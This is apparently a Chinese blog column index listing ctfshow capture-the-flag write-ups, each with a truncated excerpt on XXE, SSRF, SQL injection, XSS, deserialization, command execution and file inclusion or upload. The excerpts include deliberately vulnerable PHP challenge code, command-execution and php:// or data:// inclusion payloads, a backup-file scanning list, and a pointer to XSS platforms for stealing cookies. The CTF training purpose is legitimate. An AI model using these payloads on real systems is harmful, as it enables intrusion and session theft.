ctfshow
文章平均质量分 85
Yn8rt
我们的征途是星辰大海
展开
-
ctfshow 2022新春迎新赛(详细解说)
ctfshow 新春迎新赛热身<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2022-01-16 15:42:02# @Last Modified by: h1xa# @Last Modified time: 2022-01-24 22:14:02# @email: [email protected]# @link: https://ctfer.com*/eval($_GET['f']);直接写一句话:?原创 2022-02-11 15:14:35 · 1419 阅读 · 0 评论 -
ctfshow xxe
前置知识理解漏洞之 XXE 漏洞从XML相关一步一步到XXE漏洞参考WPweb373error_reporting(0);libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTD原创 2021-10-21 10:23:35 · 2430 阅读 · 0 评论 -
thinkPHP3.2.3反序列化漏洞
前言ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链利用链:__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->搭建:路径:/Application/Home/Controller/IndexController.class.phppublic fu原创 2021-10-10 14:46:53 · 1331 阅读 · 0 评论 -
ctfshow web入门 命令执行
命令执行web29<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}?>考点:绕过特殊字符的过滤payload:?c=system('ls');//flag.php index.php?原创 2021-10-07 11:21:04 · 2716 阅读 · 0 评论 -
ctfshow 中期测评
web486——后台扫描开局假页面,扫描后台CTF常用字典整理:.index.php.swpindex.php.swpindex.php.bak.index.php~index.php.bak_Edietplusindex.php.~index.php.~1~index.phpindex.php~index.php.rarindex.php.zipindex.php.7zindex.php.tar.gzwww.zipwww.rarwww.zipwww.7zwww.ta原创 2021-09-27 20:03:46 · 1848 阅读 · 2 评论 -
ctfshow之黑盒测试380-395
前言总结黑盒测试思路可能用到的字典xy123admin888/install/index.php/clear.php/page.php/alsckdfy/index.php/debugweb380——测试URL参数web381——找后台web382、383——sql万能密码web384——爆破开始过滤爆破字典生成:import strings1=string.ascii_lowercase # 小写字母a-zs2=string.digits # 数字f=op原创 2021-09-15 15:34:57 · 739 阅读 · 0 评论 -
ctfshow web入门 SSRF(超详解)
前言SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)https://ctf-wiki.org/web/ssrf/https://www.freebuf.com/articles/web/260806.htmlweb351<?phperror_reporting(0)原创 2021-09-08 16:54:27 · 5975 阅读 · 1 评论 -
ctfshow吃瓜杯之web(除魔女)详解
shellme搜索ctfshow即可热身<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ //参数等于4476不行 die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ //匹配到小写字母和.不行原创 2021-09-06 19:01:00 · 894 阅读 · 2 评论 -
ctfshow web 反序列化(web254-278)
知识储备随笔分类 - PHP常识PHP中的魔术变量:__sleep() //执行serialize()时,先会调用这个函数__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过)__construct() //当对象被创建时,会触发进行初始化__destruct() //对象被销毁时触发__toString(): //当一个对象被当作字符串使用时触发__call() //在对象上下文中调用不可访问的方法时触发__callStatic() //在静态上下文中原创 2021-09-04 12:54:50 · 5956 阅读 · 1 评论 -
ctfshow web入门 sql注入(超详解)201-250
web201查询语句//拼接sql语句查找指定ID用户$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";返回逻辑//对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 }需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5原创 2021-08-23 08:58:15 · 4327 阅读 · 3 评论 -
ctfshow之xss(有图易操作)
XSS平台document.cookie 获取饼干的js代码推荐xss平台:http://xsscom.com/ , https://xss.pt/JavaScript的 document.cookie 将以字符串的方式返回所有的cookie,类型格式: cookie1=value; cookie2=value; cookie3=value;2021-08-06web316(反射型)利用xss平台里的代码进行攻击: http://xsscom.com/建造完项目以后,复制代码:<sc原创 2021-08-14 19:03:13 · 616 阅读 · 0 评论 -
ctfshow-sql注入-超详解(172-200)
前言今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。新手区可以看看Y4师傅以前记录的小笔记SQL注入之MySQL注入的学习笔记(一)SQL注入之MySQL注入学习笔记(二)2021-7-25web172、web173——hex() 、to_base64()查询语句//拼接sql语句查找指定ID用户$sql = "select username,password fro原创 2021-08-05 20:05:16 · 2479 阅读 · 1 评论 -
ctfshow-php特性-超详解(干货)
PHP特性web89<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }}?>intval函数(获原创 2021-08-05 20:02:29 · 6116 阅读 · 8 评论 -
ctfshow文件上传-超详解
文件上传web153user.ini官方文档:自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样效果。除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMEN原创 2021-08-05 19:59:53 · 370 阅读 · 0 评论 -
ctfshow文件包含-超详解
文件包含web78-79<?phpif(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);}?>伪协议:?file=php://filter/read=convert.base64-encode/resource=flag.php?file=data://text/plain;base64,PD9waHAgc3lzd原创 2021-08-05 19:59:05 · 1817 阅读 · 0 评论 -
ctfshow信息搜集
信息搜集1-20前台JS绕过js前台拦截 === 无效操作当无法f12或者右键查看源代码的时候可以在URL栏view-source:http://网站/ 查看源码协议头信息泄露没思路的时候抓个包看看,可能会有意外收获robots后台泄露robots.txt文件phps源码泄露phps源码泄露有时候能帮上忙关于 phps,phps 其实就是 PHP 的源代码文件, 通常用于提供给用户查看 PHP 代码, 因为用户无法直接通过 Web 浏览器看到 PHP 文件的内容, 所以需要用 phps原创 2021-08-05 19:57:06 · 1579 阅读 · 2 评论 -
ctfshow-文件包含&文件上传(详解)
文件包含web78-79<?phpif(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);}?>伪协议:?file=php://filter/read=convert.base64-encode/resource=flag.php?file=data://text/plain;base64,PD9waHAgc3lzd原创 2021-07-20 11:07:39 · 3727 阅读 · 0 评论